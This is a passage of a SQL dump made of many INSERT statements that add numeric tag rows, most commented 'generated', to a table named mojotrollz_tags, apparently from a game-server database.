0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (9858, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (9858, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (9859, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (9859, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (9860, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (9860, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (9861, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (9861, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (9862, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (9862, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (9876, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (9877, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (9877, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (9878, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (9878, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (9879, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (9879, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (9916, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (9916, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (9936, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (9937, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (9938, 1, 1, 230, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (9938, 1, 2, 1584, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (9938, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (9956, 1, 1, 230, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (9956, 1, 2, 1584, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (9956, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (9976, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (9976, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (9977, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (9977, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (9978, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (9978, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (9979, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (9979, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (9980, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (9980, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (9981, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (9981, 1, 2, 17, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (9981, 1, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (9981, 1, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (9981, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (9982, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (9982, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (9983, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (9983, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (9984, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (9984, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (9985, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (9985, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (9986, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (9986, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (9987, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (9987, 1, 2, 14, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (9987, 1, 3, 0, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (9987, 1, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (9987, 1, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (9987, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (9988, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (9988, 1, 2, 1637, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (9988, 1, 3, 0, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (9988, 1, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (9988, 1, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (9988, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (9989, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (9989, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (9990, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (9990, 1, 2, 17, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (9990, 1, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (9990, 1, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (9990, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (9996, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (9996, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (9997, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (9997, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (9998, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (9998, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (9999, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (9999, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (10000, 1, 1, 33, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (10000, 1, 2, 209, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (10000, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (10016, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (10016, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (10017, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (10017, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (10036, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (10036, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (10037, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (10037, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (10038, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (10038, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (10040, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (10041, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (10042, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (10043, 1, 1, 230, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (10043, 1, 2, 1584, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (10043, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (10045, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (10045, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (10046, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (10046, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (10047, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (10047, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (10048, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (10048, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (10049, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (10049, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (10050, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (10050, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (10051, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (10051, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (10052, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (10052, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (10053, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (10053, 1, 2, 1497, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (10053, 1, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (10053, 1, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (10053, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (10054, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (10054, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (10055, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (10055, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (10056, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (10056, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (10057, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (10057, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (10058, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (10058, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (10059, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (10059, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (10060, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (10060, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (10061, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (10061, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (10062, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (10062, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (10063, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (10063, 1, 2, 17, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (10063, 1, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (10063, 1, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (10063, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (10076, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (10077, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (10077, 1, 30, 4, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (10078, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (10078, 1, 30, 2, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (10079, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (10079, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (10080, 1, 30, 2, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (10081, 1, 30, 2, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (10082, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (10083, 1, 1, 229, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (10083, 1, 2, 1583, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (10083, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (10085, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (10085, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (10086, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (10086, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (10088, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (10088, 1, 2, 1637, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (10088, 1, 3, 0, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (10088, 1, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (10088, 1, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (10088, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (10089, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (10089, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (10090, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (10090, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (10096, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (10116, 1, 1, 230, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (10116, 1, 2, 1584, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (10116, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (10117, 1, 1, 230, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (10117, 1, 2, 1584, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (10117, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (10118, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (10118, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (10119, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (10119, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (10120, 1, 1, 70, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (10120, 1, 2, 1337, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (10120, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (10136, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (10136, 1, 2, 1497, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (10136, 1, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (10136, 1, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (10136, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (10157, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (10157, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (10158, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (10158, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (10159, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (10159, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (10160, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (10160, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (10161, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (10162, 1, 1, 469, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (10162, 1, 2, 2677, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (10162, 1, 30, 3, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (10176, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (10176, 1, 2, 14, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (10176, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (10177, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (10178, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (10179, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (10180, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (10181, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (10181, 1, 2, 1497, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (10181, 1, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (10181, 1, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (10181, 1, 30, 3, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (10182, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (10182, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (10183, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (10184, 1, 1, 249, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (10184, 1, 2, 512, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (10184, 1, 30, 3, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (10196, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (10196, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (10197, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (10197, 1, 30, 2, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (10198, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (10198, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (10199, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (10199, 1, 30, 2, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (10200, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (10200, 1, 30, 2, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (10201, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (10201, 1, 30, 2, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (10202, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (10202, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (10204, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (10204, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (10216, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (10216, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (10217, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (10218, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (10219, 1, 1, 1, 'generated'); 